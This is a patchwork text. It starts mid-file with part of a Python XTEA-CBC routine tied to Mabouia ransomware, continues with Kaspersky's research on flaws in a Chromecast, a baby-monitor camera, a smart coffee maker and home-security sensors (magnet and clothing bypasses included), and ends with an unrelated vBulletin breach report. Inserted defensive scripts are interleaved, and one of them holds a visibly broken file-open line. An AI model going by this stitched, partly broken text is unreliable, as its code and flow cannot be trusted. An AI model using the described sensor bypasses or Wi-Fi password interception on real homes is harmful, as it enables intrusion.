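    prev, out = iv, bytearray()
    for i in range(0, len(ciphertext), BLOCK):
        c = ciphertext[i:i + BLOCK]
        out += bytes(a ^ b for a, b in zip(xtea_decrypt_block(key, c), prev))
        prev = c
    return _unpad(bytes(out))


def xtea_cbc_decrypt_or_none(key: bytes, iv: bytes, ciphertext: bytes):
    """A wrong key almost always fails the padding check; when it does not,
    the result is still garbage, which is what a victim without the key gets."""
    try:
        return xtea_cbc_decrypt(key, iv, ciphertext)
    except ValueError:
        return None


# Constructed sample inputs (not values from the PoC).
SAMPLE_KEY = b"0123456789ABCDEF"
SAMPLE_IV = b"\x10\x32\x54\x76\x98\xba\xdc\xfe"
SAMPLE_FILE = b"Mabouia test document"  # 21 bytes -> padded to 24

if __name__ == "__main__":
    ct = xtea_cbc_encrypt(SAMPLE_KEY, SAMPLE_IV, SAMPLE_FILE)
    print("ciphertext:", ct.hex())
    print("with key   :", xtea_cbc_decrypt(SAMPLE_KEY, SAMPLE_IV, ct))
    print("wrong key  :", xtea_cbc_decrypt_or_none(b"F" * 16, SAMPLE_IV, ct))
```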

In the link below you can see Mabouia ransomware in action:

Surviving in an IoT-enabled world

Scare stories around the Internet of Things (IoT) conjure up images of bad guys in hoodies, who live for hacking and to make the lives of other people harder, inventing millions of ways to infiltrate your life through your gadgets. But is this perception a good enough reason to stop using smart devices? We don’t think so; we believe that customers should be aware of the potential risks and know how to mitigate them before embracing the IoT-enabled world.

More than a year ago, our colleague from the Global Research and Analysis Team, David Jacoby looked around his living-room, and decided to investigate how susceptible the devices he owned were to a cyber-attack. He discovered that almost all of them were vulnerable. So, we asked ourselves: was that a coincidence, or are the smart ‘IoT’ products currently on the market really that exposed? To find the answer, earlier this year we gathered up a random selection of connected home devices and took a look at how they work.

The devices we chose for our experiment were as follows:

a USB-dongle for video streaming (Google Chromecast);
a smartphone-controlled IP camera;
a smartphone-controlled coffee maker; and
a home security system, also smartphone-controlled.
The task we set ourselves was simple: to find out whether any of those products posed a security threat to their owner. The results of our investigation provide much food for thought.

Google Chromecast. IoT hacking for beginners

Risk: the content on the victim’s screen is streamed from a source owned by an attacker

Chromecast, which has been recently updated with a more advanced version, is an interesting device. It’s an inexpensive USB-dongle that allows you to stream media from your smartphone or tablet to a TV- or other display-screen. It works like this: the user connects it to a television’s HDMI in order to switch it on. After that the Chromecast launches its own Wi-Fi-network for initial setup. Once it has established a connection with a smartphone or a tablet, it switches its own Wi-Fi off and connects to the user’s home Wi-Fi network. It’s very convenient and user-friendly.


But this could become less convenient and decidedly unfriendly if there is a hacker nearby. The famous “rickrolling” vulnerability, discovered by security consultant, Dan Petro, proves that. It allows the content on the victim’s screen to stream from a source owned by an attacker. This is how it works: the attacker floods the device with special ‘disconnect’ requests from a rogue Raspberry Pi-based device and then, as the Chromecast turns on its own Wi-Fi module in response, Google Chromecast is reconnected to the attacker’s device making it stream the content the attacker wants.

The only way to get rid of this is to switch off the TV, take the dongle out of range of your Wi-Fi hotspot and wait until the attacker gets bored and goes away.

The only limitation to this attack is that the attacker needs to be within range of the Wi-Fi network to which the target Chromecast is connected. However, we discovered in our own experiment that this is not necessarily a restriction if you have a cheap directional Wi-Fi antenna and some Kali Linux software. When we used that, we found that Chromecast can be “rickrolled” across a far greater distance than the normal signal range for domestic Wi-Fi networks. What this means is that, while in the original hack by Dan Petro the attacker would run the risk of being spotted by an angry Chromecast owner, with a directional antenna that risk no longer exists.

We don’t regard this “finding” as a new security discovery; it simply extends a previously-known and so far unpatched security issue. It’s an exercise for beginners in IoT hacking, although it could be used in a really harmful way – but we’ll get to that later. First we’ll go through the other findings of our brief research.

Mitigation: use the device in remote parts of your house, as this lowers the risk of attacks with a directional antenna

Status: Not patched
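From the defender's side, the observable for the attack described above is a burst of disconnect frames aimed at one client. The following added example (not part of the Kaspersky research) applies a sliding-window rate check to a constructed list of parsed 802.11 management frames; the MAC addresses are locally administered placeholders.

```python
"""Flag deauth/disassoc floods against a single client, as a wireless IDS would.
Added example over constructed frame data; not code from the original article."""
from collections import defaultdict, deque

# Constructed sample (not captured data): (seconds, subtype, source MAC, destination MAC).
# 02:00:... addresses are placeholders; "aa" plays the home AP, "cc" the dongle.
SAMPLE_FRAMES = [
    (0.0, "beacon", "02:00:00:00:00:aa", "ff:ff:ff:ff:ff:ff"),
    (0.5, "probe_resp", "02:00:00:00:00:aa", "02:00:00:00:00:cc"),
    (1.0, "deauth", "02:00:00:00:00:aa", "02:00:00:00:00:cc"),  # one legitimate-looking deauth
]
# A burst of 40 disconnect frames in two seconds, carrying the AP's address.
SAMPLE_FRAMES += [(2.0 + i * 0.05, "deauth", "02:00:00:00:00:aa", "02:00:00:00:00:cc")
                  for i in range(40)]
SAMPLE_FRAMES += [(5.0, "beacon", "02:00:00:00:00:aa", "ff:ff:ff:ff:ff:ff")]

DISCONNECT_SUBTYPES = {"deauth", "disassoc"}


def detect_disconnect_floods(frames, window_s=2.0, threshold=10):
    """Return one alert per (src, dst) pair that sends more than `threshold`
    deauth/disassoc frames inside any `window_s`-second window. A handful of
    such frames is normal; dozens in seconds is the rickroll/evil-twin pattern."""
    recent = defaultdict(deque)  # (src, dst) -> timestamps still inside the window
    alerted, alerts = set(), []
    for ts, subtype, src, dst in sorted(frames):
        if subtype not in DISCONNECT_SUBTYPES:
            continue
        q = recent[(src, dst)]
        q.append(ts)
        while q and ts - q[0] > window_s:
            q.popleft()
        if len(q) > threshold and (src, dst) not in alerted:
            alerted.add((src, dst))
            alerts.append({"src": src, "dst": dst, "count": len(q),
                           "first_seen": q[0], "last_seen": ts})
    return alerts


if __name__ == "__main__":
    for a in detect_disconnect_floods(SAMPLE_FRAMES):
        print(f"disconnect flood: {a['src']} -> {a['dst']} "
              f"({a['count']} frames by t={a['last_seen']:.2f}s)")
```

A real deployment would feed this from a monitor-mode capture; the threshold and window should be tuned against the baseline of the network being watched.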

IP camera

Issue one

Risk: attackers get access to the email addresses of all the camera users who have experienced technical issues

The IP camera we investigated was positioned by its vendor as a baby monitor. You put the camera in a nursery, download an app on your smartphone, connect the camera to the app and the Wi-Fi, and off you go: you can watch your child whenever you want, from anywhere you like.


Why would someone want to hack a baby monitor, you may well ask? Actually there are a number of recorded instances of baby monitor abuse dating back as early as 2013 (http://www.cbsnews.com/news/baby-monitor-hacked-spies-on-texas-child/) with a similar issue reported in 2015 (http://www.kwch.com/news/local-news/whitewater-woman-says-her-baby-monitor-was-hacked/32427912). So yes, there are people who, for some reason want to hack baby monitors.

When we investigated our camera (in the spring of 2015) there were two different apps available for customers that enabled them to communicate with the camera. Both contained security issues. We were later to learn from the vendor that one of these apps was a legacy app, however it was still being used by a number of camera owners. We discovered that this legacy app contained hardcoded credentials to a Gmail account.

public static final String EMAIL_FROM = "*****@gmail.com";
public static final String EMAIL_PASSWORD = "*******";
public static final String EMAIL_PORT = "465";
public static final String EMAIL_SMTP_HOST = "smtp.gmail.com";
public static final String EMAIL_TO;
public static final String EMAIL_TO_MAXIM = "maximidc@gmail.com";
public static final String EMAIL_TO_PHILIPS = "*****@philips.com";
public static final String EMAIL_USERNAME = "*****@gmail.com";

The vendor later told us that the account was used to collect reports on technical issues from the camera users.

The problem here is that reports were being sent to this pre-installed account from users’ own email accounts. So an attacker would not even need to buy a camera; all they needed to do was download and reverse-engineer one of the apps to get access to the technical email account and to collect the email addresses of all the camera users who had experienced technical issues. Is it a big issue that your email could have been exposed to a third party as a result of the exploitation of that vulnerability? It might be. However, realistically speaking this vulnerability doesn’t appear to be a tempting target for mass-harvesting personal information, mainly because of its relatively small base of victims. Technical issues are rare and the app was old and not really popular at the time of our research. Baby monitors are also a niche product, so not many email addresses are stored.

On the other hand, if you are the owner of a baby monitor, you’re most likely a parent and that fact makes you (and by extension your email address) a much more interesting target should an attacker plan a specific, tailored, fraud campaign.

In other words, this is not a critical security vulnerability but it could still be used by attackers. But that wasn’t the only vulnerability we found while investigating the camera and the app.

Status: fixed

Issue two

Risk: full control of the camera by an attacker

After looking at the legacy app we moved on to the more recent version and immediately discovered another interesting issue.

The application communicates with the camera through a cloud service and communication between the app and the cloud service is https-encrypted. The application uses Session ID for authentication which is changed automatically each time a user initiates a new session. It might sound secure, but it is in fact possible to intercept the Session ID and to control the camera through the cloud or to retrieve the password for local access to the camera.

Before the app starts streaming data from the camera, it sends an http request to the cloud service:


This request contains the Session ID which could be intercepted as the request is unencrypted. The Session ID is then used to retrieve the current password. We found that it could be done by creating a special link with the Session ID in the end.


In return for this link the cloud service would send the password for the session.

https:// *****/*****/*****sessionId=100-U3a9cd38a-45ab-4aca-98fe-29b27b2ce280

… “local_view”:{“password”:”N2VmYmVlOGY4NGVj”,”port”:9090} …

Using the password it is possible to get full control of the camera, including the ability to watch the streamed video, listen to audio, and play audio on the camera.

It is important to note that this is not a remote attack – the attacker must be on the same network as the app user in order to intercept the initial request, making exploitation less likely. However, app users should still proceed with caution, especially if they are using large networks that can be accessed by many people. For example, if the app user is connecting to their camera from public Wi-Fi, they could be exposing themselves to risk from an attacker on the same network. In such conditions it would not be hard to imagine a real-life app-usage scenario that involved a third-party.
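The weakness above is a session identifier carried in a plaintext HTTP request. The following added example (not from the original research) shows two defensive checks: a scan of constructed proxy-style log lines for session-like parameters sent over http://, and the client-side rule an app should apply before attaching a session token to a URL. The hostnames and the session value are placeholders.

```python
"""Find session tokens sent over plaintext HTTP, and refuse to attach them.
Added example with constructed log lines; not code from the original article."""
import re
from urllib.parse import urlsplit, parse_qsl, urlencode

# Constructed proxy log (not captured traffic): client  method  url  status.
# The sessionId value below is a placeholder in the shape the article shows.
SAMPLE_LOG = """\
10.0.0.5 GET http://cloud.example/api/local_view?sessionId=100-U00000000-0000-4000-8000-000000000000 200
10.0.0.5 GET https://cloud.example/api/login 200
10.0.0.5 POST https://cloud.example/api/stream?sessionId=100-U00000000-0000-4000-8000-000000000000 200
10.0.0.7 GET http://cdn.example/static/logo.png 200
"""

LINE = re.compile(r"^(\S+)\s+(GET|POST|PUT|DELETE)\s+(\S+)\s+(\d{3})$")
# Parameter names that usually carry a credential or a session handle.
SENSITIVE_PARAM = re.compile(r"(session|sess|sid|token|auth|passw)", re.I)


def _mask(value: str) -> str:
    """Keep a short prefix for correlation; never log the whole token."""
    return value[:4] + "****"


def find_plaintext_session_leaks(log_text: str):
    """Return one finding per sensitive query parameter seen in a plain http:// URL.
    https:// requests are skipped: the query is inside TLS on the wire (though it
    still lands in server logs, which is a separate hygiene problem)."""
    leaks = []
    for n, raw in enumerate(log_text.splitlines(), 1):
        m = LINE.match(raw.strip())
        if not m:
            continue
        client, method, url, status = m.groups()
        parts = urlsplit(url)
        if parts.scheme.lower() != "http":
            continue
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if SENSITIVE_PARAM.search(name):
                leaks.append({"line": n, "client": client, "method": method,
                              "host": parts.hostname, "path": parts.path,
                              "param": name, "value": _mask(value)})
    return leaks


def safe_to_carry_session(url: str) -> bool:
    """Client-side rule: a session identifier may only travel inside TLS."""
    return urlsplit(url).scheme.lower() == "https"


def attach_session(url: str, session_id: str) -> str:
    """Build the request URL, refusing to put the session on a plaintext link.
    Real apps should prefer a header or cookie over a query parameter, but the
    scheme check is the part this issue was missing."""
    if not safe_to_carry_session(url):
        raise ValueError("refusing to send a session identifier over plaintext HTTP")
    sep = "&" if urlsplit(url).query else "?"
    return url + sep + urlencode({"sessionId": session_id})


if __name__ == "__main__":
    for leak in find_plaintext_session_leaks(SAMPLE_LOG):
        print(f"line {leak['line']}: {leak['param']}={leak['value']} sent in clear to {leak['host']}")
```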

Status: fixed

Issue three

Risk: god mode – an attacker can do anything with camera firmware

The third issue we discovered while investigating our smartphone-controlled camera resided not in the app but in the camera itself. And the issue is rather simple: a factory root password for SSH in the firmware. It is simple because the camera is running on Linux and the root password enables god-mode for anyone who has access to the device and knows the password. You can do anything with camera firmware: modify it, wipe it – anything. All the attacker needs to do in order to extract the password is to download and extract the firmware from the vendor’s website (although the attacker would need to be in the same network with the attacked device to get the URL from which the firmware is being downloaded), extract it and follow this path: \\ubifs\\home/.config. There it is: in plain text.



What’s more worrying is that, unless they are a Linux expert, there is no way for an inexperienced user to remove or change this password by themselves.

Why the SSH password was there is a mystery to us, but we have some suggestions. The root access would be of use to developers and technical support specialists in a situation where a customer encounters an unexpected technical problem that could not be fixed over the phone. In this case, a specialist could connect to the camera remotely, use the SSH password to get root access and fix an issue. Apparently this is a common practice for new models of such devices, which can contain bugs that were not discovered and fixed at the pre-release stage. We looked at the firmware of some other cameras from an alternative vendor and also discovered SSH passwords in there. So the story is: developers leave the SSH password in the firmware in order to have the ability to fix unexpected bugs there and then, and when a stable version of firmware is released they just forget to remove or encrypt the password.

Our second suggestion is that they just forgot it was there. As we discovered during our research, the part of the device where SSH passwords were found – the chipset – is usually shipped by a third-party vendor. And the third-party vendor leaves the SSH password in the camera by default for convenience, to make sure that the vendor of the end-product (the baby monitor) has the ability to tune up the chipset and to connect it with other hardware and software. So the vendor does this and then just forgets to remove the password. As simple as it sounds.
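Both the legacy app (issue one, hardcoded Gmail credentials in the APK) and the firmware (issue three, a plaintext root password under the extracted file system) are the same class of defect: secrets shipped in an artifact anyone can download. The following added example (not from the original research) is a small scanner for that class; it flags credential-named constants in decompiled Java and password-like keys in config files, run here over a constructed sample tree with fake values.

```python
"""Scan decompiled app sources and an extracted firmware tree for hardcoded secrets.
Added example over constructed files; not code from the original article."""
import os
import re
import tempfile

# Names that usually hold a credential. "pass" alone would also hit "bypass",
# so the pattern requires the full word forms; tune for your code base.
SECRET_NAME = re.compile(r"(passw(or)?d|secret|token|api_?key|private_?key)", re.I)
# Decompiled Java: ... String NAME = "value";
JAVA_CONST = re.compile(r'String\s+(\w+)\s*=\s*"([^"]*)"')
# Config style: name=value or name: value
KV_LINE = re.compile(r'^\s*([\w.-]+)\s*[=:]\s*(\S+)\s*$')


def scan_text(source: str, text: str):
    """Return findings for one file's content. Values are masked in the output."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m, kind = JAVA_CONST.search(line), "java-constant"
        if not m:
            m, kind = KV_LINE.match(line), "config-value"
        if not m:
            continue
        name, value = m.group(1), m.group(2)
        if value and SECRET_NAME.search(name):
            findings.append({"source": source, "line": n, "kind": kind, "name": name,
                             "value": value[:2] + "*" * (len(value) - 2)})
    return findings


def scan_tree(root: str):
    """Walk an unpacked APK/firmware directory; skip files that are not text."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            try:
                with open(path, encoding="utf-8") as fh:
                    text = fh.read()
            except (UnicodeDecodeError, OSError):
                continue
            findings += scan_text(os.path.relpath(path, root), text)
    return sorted(findings, key=lambda f: (f["source"], f["line"]))


# Constructed samples in the shape of the article's findings; all values are fake.
JAVA_SAMPLE = '''// Constructed stand-in for the decompiled legacy app (values are fake).
public static final String EMAIL_PASSWORD = "example-not-a-real-secret";
public static final String EMAIL_PORT = "465";
public static final String EMAIL_SMTP_HOST = "smtp.gmail.com";
public static final String EMAIL_USERNAME = "someone@example.com";
'''
FIRMWARE_CONFIG = '''# Constructed stand-in for a .config file inside an extracted firmware tree.
ssh_port=22
root_password=example-not-a-real-secret
'''


def demo():
    """Build the sample tree in a temp directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "app"))
        os.makedirs(os.path.join(root, "fw", "ubifs", "home"))
        with open(os.path.join(root, "app", "MailConfig.java"), "w", encoding="utf-8") as fh:
            fh.write(JAVA_SAMPLE)
        with open(os.path.join(root, "fw", "ubifs", "home", ".config"), "w", encoding="utf-8") as fh:
            fh.write(FIRMWARE_CONFIG)
        with open(os.path.join(root, "fw", "etc", "motd") if os.makedirs(os.path.join(root, "fw", "etc"), exist_ok=True) is None else "", "w", encoding="utf-8") as fh:
            fh.write("Welcome to the camera shell\n")
        return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['source']}:{f['line']} {f['kind']} {f['name']} = {f['value']}")
```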

Status: fixed

Communications with the vendor

It wasn’t hard to discover these vulnerabilities and we have to admit that it wasn’t difficult to report them to the vendor and help them to patch them. The camera we investigated was branded by Philips, but was actually produced and maintained by Gibson Innovations. The representatives of the company were extremely quick to react to our report. As a result all the issues we reported have been patched, both in the camera and in the apps (Android and iOS).

This autumn, Rapid7 released a very interesting report about vulnerabilities in baby monitors, and a Philips product (a slightly different version of the camera we investigated) was on the list of vulnerable devices, with a number of vulnerabilities noted, some of them similar to those discovered in our research. But judging by the ‘from-discovery-to-patch’ timeline presented in the report, Gibson Innovations is one of only a few IoT vendors to treat security issues in their products seriously and to do so continuously. Kudos to them for such a responsible approach.

But back to our research.

One could say that the security issues we’ve discovered in the IP camera require access to the same network as the user of the camera or the camera itself, and they would be right. On the other hand, for an intruder that is not necessarily a major obstacle, especially if the user has another connected device in their network.

A smartphone-controlled coffee machine

What could possibly go wrong?

Risk: leakage of the password to the home wireless network

The coffee machine we’ve randomly chosen can remotely prepare a cup of coffee at the exact time you want. You just set the time and when the coffee is ready the app will send you a push-notification. You can also monitor the status of the machine through an app. For instance, it is possible to find out if it is brewing now or not, if it is ready for brewing or if it is time to refill the water container. In other words, a very nice device, which, unfortunately, gives an attacker a way to hijack the password of your local Wi-Fi network.


Before you use it you have to set it up. It happens like this: when the device is plugged in, it creates a non-encrypted hotspot and listens to UPNP traffic. A smartphone running the application for communicating with the coffee machine connects to this hotspot and sends a broadcast UDP request asking if there are UPNP devices in the network. As our coffee machine is such a device, it responds to this request. After that a short communication containing the SSID and the password to the home wireless network, among other things, is sent from the smartphone to the device.


This is where we detected a problem. Although the password is sent in encrypted form, the components of the encryption key are sent through an open, non-protected channel. These components are the coffee machine’s Ethernet address and some other unique credentials. Using these components, the encryption key is generated in the smartphone. The password to the home network is encrypted with this key using 128-bit AES, and sent in base64 form to the coffee machine. In the coffee machine, the key is also generated using these components, and the password can be decrypted. Then, the coffee machine connects to the home wireless network and ceases to be a hotspot until it is reset. From this moment on, the coffee machine is only accessible via the home wireless network. But it doesn’t matter, as by then the password is already compromised.
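The flaw described above is in the key, not the cipher: both sides derive the AES key from values the machine broadcasts in the clear, so anyone listening on the open setup hotspot derives the same key. The following added example (not the vendor's code; the real derivation is not published) models that setup exchange with constructed values and contrasts it with a variant that mixes in a per-device PIN printed on the machine and never transmitted, one of the fixes the article mentions. Because the standard library has no AES, an HMAC-SHA256 counter keystream stands in for the AES-128 step.

```python
"""Why a key derived from broadcast values protects nothing, and what a
never-transmitted PIN changes. Added example with constructed values."""
import base64
import hashlib
import hmac
import os

# Constructed stand-ins for what the machine sends in the clear during setup:
# its Ethernet (MAC) address and "other unique credentials". Not a real device.
BROADCAST = {"mac": "02:00:00:c0:ff:ee", "device_id": "CM-EXAMPLE-0001"}


def _public_material(b: dict) -> bytes:
    return (b["mac"] + "|" + b["device_id"]).encode()


def key_from_broadcast(b: dict) -> bytes:
    """Scheme as described: every input to the key was observable on the
    open hotspot, so the eavesdropper's key equals the phone's key."""
    return hashlib.sha256(_public_material(b)).digest()[:16]


def key_from_broadcast_and_pin(b: dict, pin: str) -> bytes:
    """Hardened variant: the PIN printed on the machine is the only secret
    input; the broadcast values serve as salt. PBKDF2 slows PIN guessing."""
    return hashlib.pbkdf2_hmac("sha256", pin.encode(), _public_material(b), 50_000, dklen=16)


def keystream_xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Stand-in for AES-128 (not available in the stdlib): HMAC-SHA256 in
    counter mode. The lesson here is about the key, not the cipher."""
    out, counter = bytearray(), 0
    while len(out) < len(data):
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, out))


def phone_sends_password(wifi_password: str, key: bytes) -> str:
    """The phone's side of the exchange: encrypt and base64-encode, as the article describes."""
    nonce = os.urandom(8)
    return base64.b64encode(nonce + keystream_xor(key, nonce, wifi_password.encode())).decode()


def device_receives_password(blob: str, key: bytes) -> str:
    raw = base64.b64decode(blob)
    return keystream_xor(key, raw[:8], raw[8:]).decode(errors="replace")


def eavesdropper_recovers(blob: str, broadcast: dict) -> str:
    """What a listener on the setup hotspot gets: they saw the broadcast, so
    they rebuild the same key. With the PIN variant this yields garbage."""
    return device_receives_password(blob, key_from_broadcast(broadcast))


if __name__ == "__main__":
    pw = "correct horse battery"
    weak = phone_sends_password(pw, key_from_broadcast(BROADCAST))
    print("broadcast-derived key, eavesdropper sees:", eavesdropper_recovers(weak, BROADCAST))
    strong = phone_sends_password(pw, key_from_broadcast_and_pin(BROADCAST, "4821"))
    print("PIN-derived key, eavesdropper sees:      ", eavesdropper_recovers(strong, BROADCAST))
```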

Status: the vulnerability is still in place

Communications with vendor

We’ve reported our findings to the vendor of the coffee machine, and the vendor has acknowledged the issue and provided us with the following statement:

“Both user experience and security are extremely important to us and we continually strive to strike the right balance between the two. The actual risks associated with the vulnerabilities you mentioned during set-up are extremely low. In order to gain access, a hacker would have to be physically within the radius of the home network at the exact time of set-up, which is a window of only a few minutes. In other words, a hacker would have to specifically target a smart coffee maker user and be around at the exact point of set-up, which is extremely unlikely. Because of this, we do not believe the potential vulnerabilities justify the significant negative impacts it will have on user experience if we make the suggested changes. Though no definite plans to change our set-up procedure are in the works, we are constantly reevaluating and wouldn’t hesitate to make changes if risks become more significant. Should something change in the near future we will let you know.”

We don’t entirely disagree with this statement and have to admit that the attack window is extremely short. The vulnerability could be patched in several ways, but based on the conclusions of our own analysis, almost all of these ways would involve either hardware changes (the Ethernet port on the coffee machine or a keyboard for the password would solve the problem) or the provision of a unique pin code for each coffee machine including those that have already been sold, which is not easy from a logistical point of view. Such changes would considerably impact the user experience and the set up process would become less straightforward.

The only software fix we can propose is to implement asymmetric encryption. In this case the coffee maker would have to send out the public encryption key to the user’s smartphone and only after that would the sensitive data exchange start. This, however, would still allow any user in a given Wi-Fi network, including the attacker, to take control of the coffee machine. The public key would be available to everyone, and the first user to receive it and establish the connection with the coffee maker would be able to control it. Nevertheless, the legitimate user of the coffee machine would at least have a clue that something is going wrong, as during or following a successful attack they wouldn’t be able to communicate with the device. This is not the case with the current software running on the coffee machine.

So we can say that to some degree we understand the vendor logic: the level of risk this issue brings doesn’t match the level of complexity of measures that must be implemented in order to eliminate the issue. Besides that, it would be wrong to say that the vendor didn’t think about the security of their product at all: as we said earlier, the password is transmitted in protected form, and you have to hold the antenna in a special way.

However, the vulnerability still exists and for a smart criminal it wouldn’t be a problem to exploit it to obtain your Wi-Fi password. The situation is interesting: if you are a user of this coffee maker, every time you change the password for your home Wi-Fi network in order to make it more secure, you’re actually exposing this new password, because each time you implement a new password you have to set up the coffee machine again. And you would never know whether someone had sniffed your password or not. For some people this may not be an issue, but for others it is most certainly a security problem.

For this reason, we will not disclose the vendor or model so as not to draw unwanted attention to the vulnerable product. However, if you are a user of a smartphone-controlled coffee maker and you’re worried about this issue, do not hesitate to contact the vendor and ask them if our findings have something to do with the product that you own, or are planning to purchase.

Onto the final chapter of our journey into the insecure world of IoT.

Home security system vs physics

Risk: bypassing security sensors with no alarms

App-controlled home security systems are pretty popular nowadays. The market is full of different products intended to secure your home from physical intrusion. Usually such systems include a hub that is connected to your home network and to your smartphone, and a number of battery-powered sensors that communicate wirelessly with the hub. The sensors are usually door/window contact sensors that would inform the owner if the window or door they guard has been opened; motion sensors; cameras.

When we initially got our hands on a smart home security system we were excited. Previously we’d seen a lot of news about researchers finding severe vulnerabilities in such products, like the research from HP or another awesome piece of research on the insecurity of the ZigBee protocol used by such products, presented at this year’s Black Hat. We prepared ourselves for an easy job finding multiple security issues.


But that wasn’t the case. The more we looked into the system the better we understood that, from a cyber-security perspective, it is a well-designed device. In order to set up the system, you have to connect the hub directly to your Wi-Fi router, and in order to make the app communicate with the hub, you have to create an account on the vendor’s website, provide your phone number and enter the secret pin code that is sent to you via SMS. All communications between the app and the system are routed through the vendor’s cloud service and everything is done over https.

When looking at how the hub downloads new versions of firmware, we found that the firmware is not signed, which is a bit of an issue as it potentially allows you to download any firmware onto the device. But at the same time, in order to do so you’d have to know the password and the login of the user account. Also, when on the same network as the security system it is possible to send commands to the hub, but to understand what kind of commands it is possible to send, you’d need to reverse-engineer the hub firmware which is not really security research, but aggressive hacking. We’re not aggressive hackers.

So from a software point of view – if you’re not intending to hack a device at all costs – the home security system we investigated was secure.

But then we looked at the sensors.

Defeating contact sensors with their own weapon

Intrusion or contact sensors, included in the package, consist of three main parts: the magnet (the part that you put on a door or on the moving part of a window), the radio transmitter, and the magnetic field sensor. It works as follows: the magnet emits a magnetic field and the magnetic field sensor registers it. If the door or window is opened, the sensor will stop registering the magnetic field and will send a notification to the hub, indicating that the door/window is open. But if the magnetic field is there, it will send no alarms, which means that all you need to bypass the sensor is a magnet powerful enough to replace the magnetic field. In our lab we put a magnet close to the sensor, and then we opened the window, got in, closed the window and removed the magnet. No alarms and no surprises.

One could say that it would only work with windows, where you may be lucky enough to easily locate the exact place where the sensor sits. But magnetic fields are treacherous and they can walk through walls, and the simplest magnetic field detection app for the smartphone will locate a sensor precisely, even if you don’t have visual contact. So doors (if they’re not made of metal) are vulnerable too. Physics wins!

Motion sensor

Encouraged by an easy victory over contact sensors we moved on to the motion sensor and disassembled it to discover that it was a rather simple infrared sensor that detects the movement of a warm object. This means that if an object is not warm the sensor doesn’t care. As we discovered during our experiment, one would only need to put on a coat, glasses, a hat and/or a mask in order to become invisible to the sensor. Physics wins again!

Protection strategies

The bad news is that magnetic field sensor-based devices and low quality infrared motion sensors are used not only by the home security system we investigated. They’re pretty standard sensors which can be found in a number of other similar products. Just search the IoT e-shops and you’ll see for yourself. There is more bad news: it is impossible to fix the issue with a firmware update. The problem is in the technology itself.

The good news is that it is possible to protect yourself from the burglars who didn’t bunk off Physics in school. The basic rules here are as follows:

Do not rely only on contact sensors when protecting your home if you are using a system of the kind described above. Smart home security system vendors usually offer additional devices, like motion- and audio-sensing cameras, which are impossible to bypass with magnets. So it would be wise to supplement the contact sensors with some smart cameras even though it may cost more. Using contact sensors alone will turn your home security system into what is essentially a high-tech ‘toy’ security system.
If you’re using infrared motion sensors, try to put them in front of a radiator in rooms a burglar will have to walk through, should they make their way into your home. In this case the intruder, no matter what clothes they are wearing, will overshadow the radiator and the sensor will notice the change and report it to your smartphone.

Based on what we discovered during our brief experiment, vendors are doing their best not to forget about the cyber-security of the devices they’re producing, which is good. Nevertheless, any connected, app-controlled device that is usually called an IoT device is almost certain to have at least one security issue. However, the probability that they will be critical is not that high.

At the same time, the low severity of such security issues doesn’t guarantee that they won’t be used in an attack. At the beginning of this article we promised to describe how the safe and funny “rickrolling” vulnerability could be used in a dangerous attack. Here it is.

Just imagine that one day a TV with a Chromecast device connected to it, both belonging to an inexperienced user, starts showing error messages which report that, in order to fix this issue, the user has to reset their Wi-Fi router to factory settings. That means the user would have to reconnect all their devices, including their Wi-Fi-enabled coffee machine. The user resets the router and reconnects all the devices. After that the Chromecast works normally again as do all the other devices in the network. What the user doesn’t notice is that someone new has connected to the router, and then jumped to the baby monitor camera or other connected devices, ones that have no critical vulnerabilities but several non-critical ones.


From an economic perspective it is still unclear why cybercriminals would attack connected home devices. But as the market of the Internet of Things takes off, and technologies are being popularized and standardized, it is only a matter of time before black hats find a way to monetize an IoT attack. Ransomware is obviously a possible way to go, but it’s certainly not the only one.

Besides that, cybercriminals are not the only ones who might become interested in IoT. For instance, this summer the Russian Ministry of Interior Affairs ordered (RU) to research possible ways of collecting forensic data from devices built with the use of smart technologies. And the Canadian military recently published a procurement request for a contractor that can “find vulnerabilities and security measures” for cars and will “develop and demonstrate exploits”.

This doesn’t mean that people should avoid using the IoT because of all the risks. The safe option is to choose wisely: consider what IoT device or system you want, what you plan to use it for and where.

Here is the list of suggestions from Kaspersky Lab:

1. Before buying an IoT device, search the Internet for news of any vulnerabilities. The Internet of Things is a very hot topic now, and a lot of researchers are doing a great job finding security issues in products of this kind, from baby monitors to app-controlled rifles. It is likely that the device you are going to purchase has already been examined by security researchers, and it is possible to find out whether the issues found in the device have been patched.

2. It is not always a great idea to buy the most recent products released on the market. Along with the standard bugs you get in new products, recently launched devices might contain security issues that haven’t yet been discovered by security researchers. The best choice is to buy products that have already received several software updates.

3. When choosing what part of your life you’re going to make a little bit smarter, consider the security risks. If your home is the place where you store many items of material value, it would probably be a good idea to choose a professional alarm system that will replace or complement your existing app-controlled home alarm system, or set up the existing system in such a way that any potential vulnerabilities would not affect its operation. Also, when choosing a device that will collect information about your personal life and the lives of your family, like a baby monitor, it may be wise to choose the simplest RF model, capable only of transmitting an audio signal and without Internet connectivity. If that is not an option, then follow our first piece of advice: choose wisely!

As for the vendors of IoT devices, we have only one, but important, suggestion: collaborate with the security community when creating new products and improving old ones. There are initiatives like Builditsecure.ly or the OWASP Internet of Things project that could actually help to build an awesome connected device with no serious security issues. At Kaspersky Lab, we will also continue our research to get more information about connected devices and to find out how to protect people against the threats that such devices pose.

vBulletin security patches and zero-day exploit available online

Rumors on the Internet say that the hackers who breached the vBulletin forum website exploited a zero-day flaw; the company has issued emergency security patches.
On Sunday the official vBulletin website was hacked. According to DataBreaches.net, the vBulletin and Foxit Software forums were hacked by Coldzer0, who stole hundreds of thousands of user records.

The hacker published screenshots showing that he managed to upload a shell to the vBulletin forum website and accessed user personal information, including user IDs, names, email addresses, security questions and answers, and password salts.

In response to the attack, vBulletin Solutions has reset the passwords for over 300,000 accounts on the official website, and vBulletin technical support has released an emergency security patch for versions 5.1.4 through 5.1.9 of the vBulletin Internet forum software.

“Very recently, our security team discovered a sophisticated attack on our network. Our investigation indicates that the attacker may have accessed customer IDs and encrypted passwords on our systems,” explained a vBulletin support manager.

